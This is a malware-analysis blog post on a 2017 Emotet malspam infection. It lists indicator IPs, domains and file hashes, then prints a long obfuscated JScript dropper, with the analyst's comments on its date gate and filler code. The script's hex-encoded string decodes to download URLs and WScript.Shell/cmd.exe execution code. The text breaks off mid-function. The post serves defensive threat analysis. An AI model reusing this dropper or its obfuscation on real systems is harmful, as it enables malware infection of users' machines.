2017-07-03 Malspam Leading To Geodo/Emotet Malware

This write-up stems from a user receiving a malicious Word document via an invoice-themed email. Running the PCAP file through Network Total, I saw that this was tagged as Geodo/Emotet malware. Googling around for Emotet, I came across a Forcepoint article in which they did a great walk-through, which you can read here. Their article seems to cover most of what I was seeing from the network-traffic perspective. Fortinet has two more articles (http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 and http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-2) that go into really good detail about how this malware works.

For the artifacts from this investigation, check out my Github repo here.

IOCs:
=====
192.190.86.56 / internetcheapskate[.]com (TCP / 80)
173.243.126.142 (TCP / 443)
50.21.183.63 (TCP / 443)
72.10.49.171 (TCP / 8080)
50.3.75.246 (TCP / 443)
195.8.196.29 / getsomeskillz[.]co[.]uk
210.1.58.39 / hygienic[.]co[.]th
91.109.6.212 / mclelland[.]net
64.90.49.44 / thetrillium[.]com

Artifacts:
==========
File name: INV 00000865.doc
File size: 36KB
MD5 hash: a1a76c1703030b3b3bcd1d15e32fb7a6
Virustotal: http://virustotal.com/en/file/922be0a8f0bb146e0fe6cbd5b3fa573980bf39572412cbc25f71cd0eb17fdd4f/analysis/
First Detected: 2017-06-30 07:28:49 UTC
Detection Ratio: 26 / 58
Malwr: http://malwr.com/analysis/ZDVhZGQ0MGQxOGI2NDM5ZTk4NzdhZjZlY2VlMDIxYjg/
Hybrid Analysis: http://www.hybrid-analysis.com/sample/922be0a8f0bb146e0fe6cbd5b3fa573980bf39572412cbc25f71cd0eb17fdd4f?environmentId=100

File name: 191599710.bin
File size: 60KB
MD5 hash: b552c54bf0047a430a285458cfa60a43
Virustotal: http://virustotal.com/en/file/bae6fec196f39c616720f4dd4296b53abf13a11d30f633ff7ddf55c3cba50ce2/analysis/
First Detected: 2017-06-30 09:54:26 UTC
Detection Ratio: 18 / 57
Malwr: NA
Hybrid Analysis: NA

File name: da241556.aoo
File size: 231KB
MD5 hash: 0e83d4d2f0d0fd1aee4e6bc4a1b05593
Virustotal: http://virustotal.com/en/file/3433d1f2419393473b8f27844a44b4258a4d41899b58699efce332b722ddc8f8/analysis/
First Detected: 2017-06-30 16:25:20 UTC
Detection Ratio: 41 / 61
Malwr: NA
Hybrid Analysis: http://www.hybrid-analysis.com/sample/3433d1f2419393473b8f27844a44b4258a4d41899b58699efce332b722ddc8f8?environmentId=100

File name: GeneralizeMspthrd.exe / 771546.exe
File size: 223KB
MD5 hash: 83b7ce632ef064c0b5a7fc608a8904a8
Virustotal: http://virustotal.com/en/file/f07139724e01f7563afb0b5ffa28d94c74471bffc4c8a106c32c801ccb69b8a3/analysis/
First Detected: 2017-07-03 15:21:53 UTC
Detection Ratio: 31 / 63
Malwr: NA
Hybrid Analysis: http://www.hybrid-analysis.com/sample/f07139724e01f7563afb0b5ffa28d94c74471bffc4c8a106c32c801ccb69b8a3?environmentId=100

File name: EF21G~.jse
File size: 56KB
MD5 hash: 98977be182118ffe6ab4dd8b495578f3
Virustotal: http://virustotal.com/en/file/1ceaed57d8fe46275e454548eaf920538c4ce933832a10be260b752101dd03dd/analysis/
First Detected: 2017-06-30 08:12:23 UTC
Detection Ratio: 0 / 56
Malwr: NA
Hybrid Analysis: NA

Analysis:
=========
To be honest, there is not much to this infection. This Emotet infection started with a user receiving an email with a malicious Word document attached. Most attackers use a macro in the Word document to kick off the infection; in this example that was not the case, as there was no macro embedded in the Word document but a malicious JavaScript file instead.

I extracted the Word document with 7-Zip and looked around at the files inside. I did not see the usual signs of a macro-enabled Word document, but I did find a BIN file in one of the folders, labeled “embeddings”, which seems to be where the script lived. I also noticed that the JavaScript file was copied to the “C:\Users\%username%\AppData\Local\Temp” folder when the Word document was opened. Below is the cleaned-up JavaScript from the %TEMP% folder.

if (Math.round(445312818)) {} /*amqeaazjduqksoqaoa*/
if (loe()) {
    var iBF = function() {};
    iBF();

    /**
     * Gate for the outer `if (loe())` of the dropper.
     *
     * With the filler stripped away, the function does only this:
     *   ioz()  -> dae = new Date();              (implicit global)
     *   eed()  -> fg  = dae.toLocaleString();    (implicit global)
     *   inx()  -> nq  = fg.toString();           (implicit global)
     *   ofe()  -> feo = '2' + '0' + '1' + '7';   ("2017", built one character at a time)
     *             auy = auy(nq, feo);            (see below)
     *   return auy;
     *
     * `auy` is the sibling function declared after this one in the same
     * `if` block; it returns srr.match(iks), i.e. nq.match("2017"). The
     * result (a match array when the locale date string contains "2017",
     * otherwise null) is written back over the `auy` binding and returned,
     * so the outer branch only runs while the clock reads 2017 -- a simple
     * date gate. Analysts sandboxing this sample with a later system date
     * will therefore see no further activity from the script.
     *
     * NOTE(review): calling loe() in the `if` condition before the block
     * that declares it is entered only works with the legacy hoisting of
     * block-level function declarations (JScript / Windows Script Host,
     * where the .jse artifact above would presumably run); a standards
     * engine such as Node would see `loe` as undefined at that point.
     * The date string format is also host/locale dependent -- confirm
     * against the actual execution environment.
     *
     * Everything else in the body -- functions that are declared but never
     * called, or called for no effect; loops whose bound is already
     * exceeded (`atb = 5; atb < 5`); `if` statements with empty bodies;
     * duplicate declarations; and the statements after `return` -- is
     * filler that appears intended to frustrate signature matching.
     */
    function loe() {
        var AYJ = function() {};
        AYJ();
        var QM = function() {
            var AYJ = function() {};
            AYJ();
        };
        QM();
        var Pu = function() {
            return 'ebx'.lastIndexOf('e');
        };

        function Wef() {
            return Math.round(731173094);
        }
        var Ap = function() {
            return 'cwo';
        };
        for (var atb = 5; atb < 5; ++atb) { // never iterates
            var AYJ = function() {};
            AYJ();
            var QM = function() {
                var AYJ = function() {};
                AYJ();
            };
            QM();
            var Pu = function() {
                return 'ebx'.lastIndexOf('e');
            };

            function Wef() {
                return Math.round(731173094);
            }
            var Ap = function() {
                return 'cwo';
            };
        }

        // Step 1 of the gate: capture the current time into a global.
        function ioz() {
            if ('poo'.search(/o/)) {}
            var zq = function() {
                return 'aur'.charAt(0);
            };

            function E2E() {
                return 'a'.charAt(0);
            }
            var AG1 = function() {
                return 625;
            };
            dae = new Date(); // implicit global
        }
        if (Math.round(209089940)) {}
        if ('ami'.lastIndexOf('a')) {
            if (Math.round(209089940)) {}
        }
        var pyu = ["zh", "f", ioz, "zh", "f"]; // ioz hidden at index 2 of a junk array
        if ('a'.slice(1, 1)) {}
        var tQ7 = function() {
            return 'l'.slice(1, 1);
        };

        function pFJ() {
            return 'o'.slice(1, 1);
        }
        var AF = function() {
            return 'kq'.lastIndexOf('k');
        };
        var omo = pyu[2]; // omo === ioz

        function Mti() {}
        Mti();
        omo(); // => ioz(): dae = new Date()

        function AW() {}
        AW();

        function VY() {
            function AW() {}
            AW();
        }
        VY();
        if ('gw'.lastIndexOf('w')) {}
        if ('eu'.search(/u/)) {
            if ('gw'.lastIndexOf('w')) {}
        }

        // Step 2 of the gate: render the captured time as a locale string.
        function eed() {
            function YcE() {
                return 'mcu'.slice(1, 2);
            }
            for (var fol = 1; fol < 5; ++fol) {}
            fg = dae.toLocaleString(); // implicit global; format is host/locale dependent
            if (Math.round(512457952)) {}
            for (var iso = 2; iso < 3; ++iso) {
                if (Math.round(512457952)) {}
            }
        }

        function ab() {
            eed();
        }
        var epo = ab;
        epo(); // => eed(): fg = dae.toLocaleString()
        for (var oom = 5; oom < 5; ++oom) {}
        var NG = function() {
            return 'ojh'.search(/j/);
        };
        var Gp = function() {
            return 'w'.toLowerCase();
        };
        var oe = function() {
            for (var oom = 5; oom < 5; ++oom) {}
            var NG = function() {
                return 'ojh'.search(/j/);
            };
            var Gp = function() {
                return 'w'.toLowerCase();
            };
        };
        oe();
        var A2k = function() {
            return 'uk'.toLowerCase();
        };

        function aD() {
            return 'sam'.slice(3, 3);
        }
        var A1d = function() {
            return new Date();
        };

        // Step 3 of the gate: copy the date string into yet another global.
        function inx() {
            function xs() {
                return 'ilz'.concat('u');
            }

            function YG() {
                return 'nie'.slice(2, 2);
            }
            var vb = function() {
                return 'o'.search(/o/);
            };
            var AT = function() {};
            AT();
            for (var pne = 1; pne < 3; ++pne) {
                function xs() {
                    return 'ilz'.concat('u');
                }

                function YG() {
                    return 'nie'.slice(2, 2);
                }
                var vb = function() {
                    return 'o'.search(/o/);
                };
                var AT = function() {};
                AT();
            }
            nq = fg.toString(); // implicit global

            function xZ() {}
            xZ();
            var Vvz = function() {
                function xZ() {}
                xZ();
            };
            Vvz();
            for (var gf = 4; gf < 5; ++gf) {
                function xZ() {}
                xZ();
                var Vvz = function() {
                    function xZ() {}
                    xZ();
                };
                Vvz();
            }
            var T22 = function() {
                return Math.sqrt(495064435);
            };
        }
        var uo = ["ibo", "u", "ewu", inx, "ibo", "u", "ewu"]; // inx hidden at index 3
        if (new Date()) {}
        for (var yii = 2; yii < 2; ++yii) {
            if (new Date()) {}
        }

        function Z0d() {
            return 'aa'.slice(1, 2);
        }

        function s2v() {
            return 'hj'.slice(1, 1);
        }
        var Pb = function() {
            return 'w'.charAt(0);
        };
        for (var fw = 5; fw < 5; ++fw) {
            if (new Date()) {}
            for (var yii = 2; yii < 2; ++yii) {
                if (new Date()) {}
            }
        }
        uo[3](); // => inx(): nq = fg.toString()
        if (Math.sqrt(447994640)) {}

        function SL() {
            return 'aey'.slice(1, 1);
        }
        var eSR = function() {
            return 'us'.replace(/u/, 'u');
        };

        function mD() {
            return 'sie'.toLowerCase();
        }
        for (var cac = 3; cac < 5; ++cac) {}
        for (var ku = 5; ku < 5; ++ku) {
            for (var cac = 3; cac < 5; ++cac) {}
        }
        var At = function() {
            return 'q'.lastIndexOf('q');
        };
        var Fr = function() {
            return new Date();
        };

        // Step 4 of the gate: assemble "2017" and match it against the date string.
        function ofe() {
            if ('eh'.lastIndexOf('h')) {}
            var feo = "";
            feo += '2'; // feo = "2"
            for (var iya = 1; iya < 2; ++iya) {}
            if (new Date()) {
                for (var iya = 1; iya < 2; ++iya) {}
            }
            feo += '0'; // feo = "20"

            function N8l() {}
            N8l();

            function u5() {
                return 'rai'.toLowerCase();
            }
            var kY = function() {
                return 'hue'.concat('i');
            };
            if (79) {
                function N8l() {}
                N8l();
            }
            feo += '1'; // feo = "201"

            function w3() {}
            w3();

            function Yw() {
                function w3() {}
                w3();
            }
            Yw();

            function K() {
                function w3() {}
                w3();

                function Yw() {
                    function w3() {}
                    w3();
                }
                Yw();
            }
            K();
            feo += '7'; // feo = "2017"
            if ('thf'.concat('uc')) {}
            if ('c'.toLowerCase()) {
                if ('thf'.concat('uc')) {}
            }
            // nq.match("2017"); the result replaces the `auy` function binding
            auy = auy(nq, feo);
            if ('oa'.concat('op')) {}
        }

        function azo() {
            if ('r'.replace(/r/, 'r')) {}
            var MQ = function() {
                return 'ti'.toLowerCase();
            };
            for (var ios = 1; ios < 1; ++ios) {
                if ('r'.replace(/r/, 'r')) {}
                var MQ = function() {
                    return 'ti'.toLowerCase();
                };
            }
            ofe();
            if ('j'.search(/j/)) {}

            function Oxd() {
                return 'o'.charAt(0);
            }
            var WR = function() {
                return 'm'.concat('vzi');
            };

            function U9P() {
                return Math.sqrt(702390550);
            }
            if ('u'.slice(1, 1)) {
                if ('j'.search(/j/)) {}

                function Oxd() {
                    return 'o'.charAt(0);
                }
                var WR = function() {
                    return 'm'.concat('vzi');
                };

                function U9P() {
                    return Math.sqrt(702390550);
                }
            }
        }
        var Cae = function() {};
        Cae();
        azo(); // => ofe() => auy = nq.match("2017")
        return auy; // match array (truthy) if the date string contains "2017", else null

        // Unreachable from here on.
        function N1() {}
        N1();
        if (Math.round(842596658)) {
            function N1() {}
            N1();
        }

        function zQ8() {
            return 'aa'.search(/a/);
        }
        var Ko8 = function() {
            return new Date();
        };

        function Az() {
            return 'cw'.replace(/w/, 'c');
        }
        if (814) {
            function N1() {}
            N1();
            if (Math.round(842596658)) {
                function N1() {}
                N1();
            }
        }
    }

    /**
     * The only real helper in this block: returns `srr.match(iks)`.
     *
     * Called once from loe() as auy(nq, feo), where nq is the locale date
     * string and feo the string "2017". loe() then overwrites this binding
     * with the call result (`auy = auy(nq, feo)`), after which the name no
     * longer refers to the function.
     *
     * @param {string} srr - string to search (the date string)
     * @param {string|RegExp} iks - pattern passed straight to String.prototype.match
     * @returns {Array|null} match array, or null when there is no match
     *
     * AUT, A6, U and wVP are filler; ATJ after the `return` is unreachable.
     */
    function auy(srr, iks) {
        function AUT() {
            return 'ipk'.concat('box');
        }
        var A6 = function() {
            return 'o'.toLowerCase();
        };

        function U() {
            return 'ui'.search(/u/);
        }
        var wVP = function() {};
        wVP();
        return srr.match(iks);
        var ATJ = function() {}; // unreachable
        ATJ();
    }

    function wVm() {}
    wVm();

    function m5C() {
        return 'kud'.search(/u/);
    }
    var XEy = function() {
        function wVm() {}
        wVm();
    };
    XEy();
    var rhj = "";
    for (var seq = 5; seq < 5; ++seq) {}

    function Ad() {
        return 'hmd'.search(/h/);
    }

    function eeq() {
        return 'tz'.concat('gp');
    }
    var gI = function() {
        return 'xd'.charAt(1);
    };
    for (var asm = 3; asm < 5; ++asm) {
        for (var seq = 5; seq < 5; ++seq) {}
    }
    rhj += '0A76617220616F203D205B2022687474703A2F2F6';
    var y6M = function() {
        return new Date();
    };
    var zh = function() {
        return 'eeu'.lastIndexOf('u');
    };

    function wpL() {}
    wpL();
    for (var ihm = 5; ihm < 5; ++ihm) {
        var y6M = function() {
            return new Date();
        };
        var zh = function() {
            return 'eeu'.lastIndexOf('u');
        };

        function wpL() {}
        wpL();
    }
    if (962) {
        var y6M = function() {
            return new Date();
        };
        var zh = function() {
            return 'eeu'.lastIndexOf('u');
        };

        function wpL() {}
        wpL();
        for (var ihm = 5; ihm < 5; ++ihm) {
            var y6M = function() {
                return new Date();
            };
            var zh = function() {
                return 'eeu'.lastIndexOf('u');
            };

            function wpL() {}
            wpL();
        }
    }
    rhj += '76574736F6D65';
    var jK = function() {
        return 25;
    };
    var RA = function() {
        return 'iie'.lastIndexOf('i');
    };

    function JK() {
        return Math.round(390071800);
    }

    function uA() {}
    uA();
    rhj += '736B696C6C7A2E636F2';

    function Vj6() {}
    Vj6();

    function sq() {
        return 202;
    }
    rhj += 'E756B2F73632F';

    function Rn() {}
    Rn();
    for (var ekk = 5; ekk < 5; ++ekk) {
        function Rn() {}
        Rn();
    }
    for (var jio = 4; jio < 4; ++jio) {
        function Rn() {}
        Rn();
        for (var ekk = 5; ekk < 5; ++ekk) {
            function Rn() {}
            Rn();
        }
    }
    rhj += '222C22687474703';

    function A1p() {}
    A1p();
    var V = function() {
        return 'h';
    };
    rhj += 'A2F2F696E7465726E6574636865';
    if ('u'.charAt(0)) {}
    rhj += '6170736B6174652E636F6D2F65';
    var A7 = function() {};
    A7();
    for (var yfu = 3; yfu < 3; ++yfu) {
        var A7 = function() {};
        A7();
    }
    for (var og = 1; og < 2; ++og) {
        var A7 = function() {};
        A7();
        for (var yfu = 3; yfu < 3; ++yfu) {
            var A7 = function() {};
            A7();
        }
    }
    rhj += '7A';
    rhj += '656F66626877792F222C22687474703A2F2F68796769656E6';
    rhj += '9632E636F2E74682F706C7567696';
    rhj += 'E732F757365722F63706366';
    rhj += '657268656E2F222C2268';
    var AZo = function() {};
    AZo();
    rhj += '7474703A2F2F6D636C6';
    var iie = function() {
        return 'aee'.lastIndexOf('e');
    };

    function YI2() {
        return new Date();
    }
    for (var oy = 1; oy < 2; ++oy) {}
    var Edy = function() {
        var iie = function() {
            return 'aee'.lastIndexOf('e');
        };

        function YI2() {
            return new Date();
        }
        for (var oy = 1; oy < 2; ++oy) {}
    };
    Edy();
    var Kul = function() {
        return 'e'.search(/e/);
    };
    var LP = function() {
        return 'ooo'.search(/o/);
    };
    var TS4 = function() {
        return 'jhg'.replace(/g/, 'j');
    };
    rhj += '56C6C616E642E6E65742F65796B696A6C616968772F222C22';
    var PvJ = function() {};
    PvJ();
    var A4y = function() {
        return Math.round(538289171);
    };
    var cal = function() {
        return 'ii';
    };
    var Zwb = function() {
        return 'rel'.search(/r/);
    };
    rhj += '687474703A2F';
    var Scd = function() {};
    Scd();
    var X9 = function() {
        return Math.round(869534154);
    };
    rhj += '2F7468657472696C6C69756D2E636F6D2F71747672';
    if (Math.round(159493726)) {}
    rhj += '7';
    var JHE = function() {};
    JHE();
    if (Math.round(242692711)) {
        var JHE = function() {};
        JHE();
    }
    var Iq = function() {
        return 'yd';
    };

    function AC() {
        return new Date();
    }
    var Xk = function() {
        return 'aos'.charAt(2);
    };
    for (var aay = 1; aay < 4; ++aay) {
        var JHE = function() {};
        JHE();
        if (Math.round(242692711)) {
            var JHE = function() {};
            JHE();
        }
    }
    rhj += '4676A656D2F22205D3B';
    var IZ = function() {};
    IZ();
    var tJJ = function() {
        return Math.round(548425595);
    };
    var ht8 = function() {
        return 'ikt'.search(/k/);
    };
    rhj += '0A0A66756E63746';
    if (Math.sqrt(95814050)) {}
    for (var eb = 5; eb < 5; ++eb) {
        if (Math.sqrt(95814050)) {}
    }
    if ('b'.slice(1, 1)) {
        if (Math.sqrt(95814050)) {}
        for (var eb = 5; eb < 5; ++eb) {
            if (Math.sqrt(95814050)) {}
        }
    }
    var AMP = function() {
        return 'ubv';
    };
    var qN3 = function() {
        return 'roi'.search(/r/);
    };

    function A2v() {
        return 'ugk'.slice(3, 3);
    }
    rhj += '96F6E20756';
    if (new Date()) {}
    var OX = function() {
        if (new Date()) {}
    };
    OX();
    var XAH = function() {
        return 'ish'.concat('ouw');
    };

    function Wc() {
        return 'nt'.lastIndexOf('t');
    }
    if ('ion'.toLowerCase()) {
        if (new Date()) {}
        var OX = function() {
            if (new Date()) {}
        };
        OX();
    }
    rhj += '928206D756B2C207569752';
    for (var fua = 5; fua < 5; ++fua) {}
    for (var ili = 4; ili < 4; ++ili) {
        for (var fua = 5; fua < 5; ++fua) {}
    }
    for (var tsm = 1; tsm < 5; ++tsm) {
        for (var fua = 5; fua < 5; ++fua) {}
        for (var ili = 4; ili < 4; ++ili) {
            for (var fua = 5; fua < 5; ++fua) {}
        }
    }
    var hq = function() {
        return 'x'.concat('e');
    };

    function zn() {
        return Math.round(270424643);
    }
    rhj += '0290A7B0A2020202072657475726E204D6174682E666C6F6F7';
    var AM = function() {};
    AM();
    if ('w'.charAt(0)) {
        var AM = function() {};
        AM();
    }
    var p8 = function() {
        return 'eei'.search(/e/);
    };
    for (var ee = 2; ee < 2; ++ee) {
        var AM = function() {};
        AM();
        if ('w'.charAt(0)) {
            var AM = function() {};
            AM();
        }
        var p8 = function() {
            return 'eei'.search(/e/);
        };
    }
    rhj += '228204D6174682E72616E646F6D2829202A';
    if (952) {}

    function KI() {
        if (952) {}
    }
    KI();
    if ('auf'.replace(/a/, 'f')) {
        if (952) {}

        function KI() {
            if (952) {}
        }
        KI();
    }
    rhj += '2028756975202D206D756';

    function i5P() {
        return new Date();
    }

    function ME() {
        return Math.round(892861596);
    }

    function S6() {
        return 'uei'.slice(1, 1);
    }

    function mK() {}
    mK();
    var AWD = function() {
        function i5P() {
            return new Date();
        }

        function ME() {
            return Math.round(892861596);
        }

        function S6() {
            return 'uei'.slice(1, 1);
        }

        function mK() {}
        mK();
    };
    AWD();
    var yzg = function() {
        return new Date();
    };

    function Q() {
        return 'vxf'.concat('hte');
    }

    function eG() {
        function i5P() {
            return new Date();
        }

        function ME() {
            return Math.round(892861596);
        }

        function S6() {
            return 'uei'.slice(1, 1);
        }

        function mK() {}
        mK();
        var AWD = function() {
            function i5P() {
                return new Date();
            }

            function ME() {
                return Math.round(892861596);
            }

            function S6() {
                return 'uei'.slice(1, 1);
            }

            function mK() {}
            mK();
        };
        AWD();
        var yzg = function() {
            return new Date();
        };

        function Q() {
            return 'vxf'.concat('hte');
        }
    }
    eG();
    rhj += 'B202B2031292029202B206D756B';

    function Z3() {}
    Z3();
    for (var nga = 5; nga < 5; ++nga) {
        function Z3() {}
        Z3();
    }
    for (var bs = 5; bs < 5; ++bs) {
        function Z3() {}
        Z3();
        for (var nga = 5; nga < 5; ++nga) {
            function Z3() {}
            Z3();
        }
    }
    rhj += '3B0A7D0A0A66756';

    function AA() {
        return 'q'.search(/q/);
    }
    for (var sxh = 3; sxh < 3; ++sxh) {}
    var Z4 = function() {
        return 'o'.lastIndexOf('o');
    };

    function Kl() {
        return Math.round(353084983);
    }

    function cpA() {
        return 255;
    }
    var A5 = function() {
        function AA() {
            return 'q'.search(/q/);
        }
        for (var sxh = 3; sxh < 3; ++sxh) {}
    };
    A5();
    rhj += 'E637469';

    function tcE() {}
    tcE();

    function dk() {
        return 'ea'.search(/e/);
    }
    var PTR = function() {
        return 687;
    };
    rhj += '6F6E2079656928290A7B0A2020202076';
    rhj += '617220616962203D2075692820';
    var WT = function() {};
    WT();
    var Qw = function() {
        return new Date();
    };

    function Ab2() {
        return 192;
    }
    if (967) {
        var WT = function() {};
        WT();
        var Qw = function() {
            return new Date();
        };

        function Ab2() {
            return 192;
        }
    }
    rhj += '302C20616F2E6C656E677468202D203120293B0A2';
    var AhV = function() {
        return 'boo'.slice(3, 3);
    };

    function IX() {}
    IX();

    function js() {
        var AhV = function() {
            return 'boo'.slice(3, 3);
        };

        function IX() {}
        IX();
    }
    js();
    rhj += '0202020766172';
    for (var dah = 1; dah < 2; ++dah) {}
    for (var oki = 5; oki < 5; ++oki) {
        for (var dah = 1; dah < 2; ++dah) {}
    }
    if ('o'.concat('io')) {
        for (var dah = 1; dah < 2; ++dah) {}
        for (var oki = 5; oki < 5; ++oki) {
            for (var dah = 1; dah < 2; ++dah) {}
        }
    }
    rhj += '206F78203D20616F5B20616962205D3B0A202';
    for (var mei = 5; mei < 5; ++mei) {}
    rhj += '02020';
    var Aqn = function() {
        return 'ehg'.slice(2, 2);
    };
    var xG = function() {};
    xG();
    rhj += '616F2E7';
    var AHE = function() {
        return 'osw'.slice(3, 3);
    };

    function Xp() {
        return new Date();
    }

    function UVo() {
        return new Date();
    }
    if ('ae'.lastIndexOf('e')) {}
    if (Math.round(230357487)) {
        var AHE = function() {
            return 'osw'.slice(3, 3);
        };

        function Xp() {
            return new Date();
        }

        function UVo() {
            return new Date();
        }
        if ('ae'.lastIndexOf('e')) {}
    }
    for (var tnk = 5; tnk < 5; ++tnk) {
        var AHE = function() {
            return 'osw'.slice(3, 3);
        };

        function Xp() {
            return new Date();
        }

        function UVo() {
            return new Date();
        }
        if ('ae'.lastIndexOf('e')) {}
        if (Math.round(230357487)) {
            var AHE = function() {
                return 'osw'.slice(3, 3);
            };

            function Xp() {
                return new Date();
            }

            function UVo() {
                return new Date();
            }
            if ('ae'.lastIndexOf('e')) {}
        }
    }
    rhj += '3706C69636528206169622C203120';
    if (new Date()) {}
    var SoX = function() {
        return 'i'.replace(/i/, 'i');
    };
    if (576) {
        if (new Date()) {}
    }
    rhj += '293B0A2';
    var EQ = function() {};
    EQ();
    for (var mxl = 3; mxl < 4; ++mxl) {
        var EQ = function() {};
        EQ();
    }
    var wGm = function() {
        return 'u'.replace(/u/, 'u');
    };
    var fTV = function() {
        return 'a'.replace(/a/, 'a');
    };
    var Ajt = function() {
        return 'uns'.replace(/n/, 's');
    };
    var eBJ = function() {
        var EQ = function() {};
        EQ();
        for (var mxl = 3; mxl < 4; ++mxl) {
            var EQ = function() {};
            EQ();
        }
        var wGm = function() {
            return 'u'.replace(/u/, 'u');
        };
        var fTV = function() {
            return 'a'.replace(/a/, 'a');
        };
        var Ajt = function() {
            return 'uns'.replace(/n/, 's');
        };
    };
    eBJ();

    function qPG() {
        return 'ro'.toLowerCase();
    }
    var AiK = function() {
        return new Date();
    };
    rhj += '020202072657475726E2028206';
    for (var aig = 3; aig < 3; ++aig) {}
    if (new Date()) {
        for (var aig = 3; aig < 3; ++aig) {}
    }
    rhj += 'F78203D3D20756E646566696E65642029203F20666';
    rhj += '16C7365203A206F783B0A7D0A0A66';
    for (var qq = 2; qq < 4; ++qq) {}

    function SG1() {
        return 'bu'.concat('ioa');
    }
    var y7 = function() {
        return Math.round(106855681);
    };
    if ('ybc'.concat('j')) {
        for (var qq = 2; qq < 4; ++qq) {}

        function SG1() {
            return 'bu'.concat('ioa');
        }
        var y7 = function() {
            return Math.round(106855681);
        };
    }
    var tV = function() {
        return 'uci'.search(/c/);
    };

    function aA() {
        return 'bnr'.slice(1, 1);
    }

    function dBF() {
        return 'eai'.slice(3, 3);
    }
    if (new Date()) {
        for (var qq = 2; qq < 4; ++qq) {}

        function SG1() {
            return 'bu'.concat('ioa');
        }
        var y7 = function() {
            return Math.round(106855681);
        };
        if ('ybc'.concat('j')) {
            for (var qq = 2; qq < 4; ++qq) {}

            function SG1() {
                return 'bu'.concat('ioa');
            }
            var y7 = function() {
                return Math.round(106855681);
            };
        }
        var tV = function() {
            return 'uci'.search(/c/);
        };

        function aA() {
            return 'bnr'.slice(1, 1);
        }

        function dBF() {
            return 'eai'.slice(3, 3);
        }
    }
    rhj += '756E6374696F6';
    if ('ee'.search(/e/)) {}
    for (var eeu = 4; eeu < 5; ++eeu) {
        if ('ee'.search(/e/)) {}
    }
    rhj += 'E206B696F28290A7B0A202020207661722075';
    for (var dye = 2; dye < 3; ++dye) {}
    rhj += '62203D206E657720416374697665';
    for (var di = 2; di < 3; ++di) {}
    if ('ir'.charAt(0)) {
        for (var di = 2; di < 3; ++di) {}
    }
    rhj += '584F626A656374282022536372697074696E67';
    for (var iid = 5; iid < 5; ++iid) {}

    function Wh() {
        return 162;
    }

    function vgs() {
        return 103;
    }
    for (var eqi = 1; eqi < 1; ++eqi) {
        for (var iid = 5; iid < 5; ++iid) {}
    }
    rhj += '2E46696C6553797374656D4F626A656374';
    for (var vwe = 1; vwe < 5; ++vwe) {}
    var wnK = function() {
        return Math.round(146689053);
    };
    for (var uae = 1; uae < 2; ++uae) {
        for (var vwe = 1; vwe < 5; ++vwe) {}
        var wnK = function() {
            return Math.round(146689053);
        };
    }
    rhj += '2220292E476';
    rhj += '574537065636961';

    function yT() {
        return 'p'.charAt(0);
    }

    function Qq() {}
    Qq();
    rhj += '6C466F6C6465722820322';
    if (32) {}

    function fsV() {
        return new Date();
    }
    var ZV7 = function() {
        return 'aj'.charAt(0);
    };
    rhj += '0293B0A2020202076';
    for (var zgu = 4; zgu < 5; ++zgu) {}

    function nyK() {
        return 'oj';
    }
    for (var uuk = 2; uuk < 3; ++uuk) {
        for (var zgu = 4; zgu < 5; ++zgu) {}

        function nyK() {
            return 'oj';
        }
    }

    function CI() {
        return 'oei'.toLowerCase();
    }
    if ('ou'.toLowerCase()) {
        for (var zgu = 4; zgu < 5; ++zgu) {}

        function nyK() {
            return 'oj';
        }
        for (var uuk = 2; uuk < 3; ++uuk) {
            for (var zgu = 4; zgu < 5; ++zgu) {}

            function nyK() {
                return 'oj';
            }
        }

        function CI() {
            return 'oei'.toLowerCase();
        }
    }
    rhj += '6172206269203D20222F646122202B20';
    var WLo = function() {};
    WLo();
    rhj += '75692820302C';
    if (new Date()) {}

    function Wz() {
        if (new Date()) {}
    }
    Wz();
    rhj += '203939393939392029202B20222E616F6F223B0A2020';
    for (var wiu = 3; wiu < 5; ++wiu) {}
    for (var apl = 1; apl < 2; ++apl) {
        for (var wiu = 3; wiu < 5; ++wiu) {}
    }
    rhj += '20207265747';
    for (var hxo = 1; hxo < 5; ++hxo) {}
    rhj += '5726E207562202B2062693B0A7D0A0A';
    rhj += '66756E6374696F6E207A6B722820616120290A7B0A20202';
    rhj += '020766172206969';

    function xE() {}
    xE();
    rhj += '203D206E657720416374697665584F62';
    rhj += '6A65637428202257';
    if (286) {}

    function vt() {
        return 'u'.charAt(0);
    }
    var PU = function() {
        return new Date();
    };
    var AHO = function() {
        return 'u'.lastIndexOf('u');
    };
    if (new Date()) {
        if (286) {}

        function vt() {
            return 'u'.charAt(0);
        }
        var PU = function() {
            return new Date();
        };
        var AHO = function() {
            return 'u'.lastIndexOf('u');
        };
    }
    rhj += '536372697';
    for (var ffm = 2; ffm < 4; ++ffm) {}
    rhj += '0742E5368656C6C2220293B0A202020207661722';
    if ('u'.charAt(0)) {}
    if ('iod') {
        if ('u'.charAt(0)) {}
    }
    var vd = function() {
        return Math.round(45561718);
    };
    for (var ukn = 4; ukn < 5; ++ukn) {
        if ('u'.charAt(0)) {}
        if ('iod') {
            if ('u'.charAt(0)) {}
        }
        var vd = function() {
            return Math.round(45561718);
        };
    }
    var hQv = function() {
        return 'io'.replace(/o/, 'i');
    };
    rhj += '068696B203D2027636D642E657865202F63202227202';
    if ('a'.slice(1, 1)) {}
    for (var okb = 2; okb < 2; ++okb) {
        if ('a'.slice(1, 1)) {}
    }
    rhj += 'B206';
    var JIa = function() {};
    JIa();
    rhj += '161202B202722273B0A2020202076617220796973203D2';

    function AzO() {}
    AzO();
    for (var iy = 1; iy < 1; ++iy) {
        function AzO() {}
        AzO();
    }

    function gv() {
        return 'and'.charAt(1);
    }

    function AWg() {
        return new Date();
    }
    var d1x = function() {
        return 'e'.slice(1, 1);
    };
    var A3 = function() {
        return new Date();
    };

    function A44() {
        return 'uh'.lastIndexOf('u');
    }
    if (Math.round(908244070)) {
        function AzO() {}
        AzO();
        for (var iy = 1; iy < 1; ++iy) {
            function AzO() {}
            AzO();
        }

        function gv() {
            return 'and'.charAt(1);
        }

        function AWg() {
            return new Date();
        }
    }
    rhj += '069692E52756E282068696B2C2066616';
    for (var ah = 1; ah < 1; ++ah) {}
    if ('ua'.lastIndexOf('u')) {
        for (var ah = 1; ah < 1; ++ah) {}
    }
    rhj += 'C736520293B0A202020200A202020207D0A0A66756E6374696';
    rhj += 'F6E2078616F28207075772C20616120290A7B0A202';
    rhj += '02020736F6';

    function tK9() {}
    tK9();
    var bT = function() {
        return 'ua'.slice(1, 1);
    };
    rhj += 'A2E4F7';

    function An7() {}
    An7();
    rhj += '0656E28293B0A20202020736F6A2E54';
    var jUI = function() {
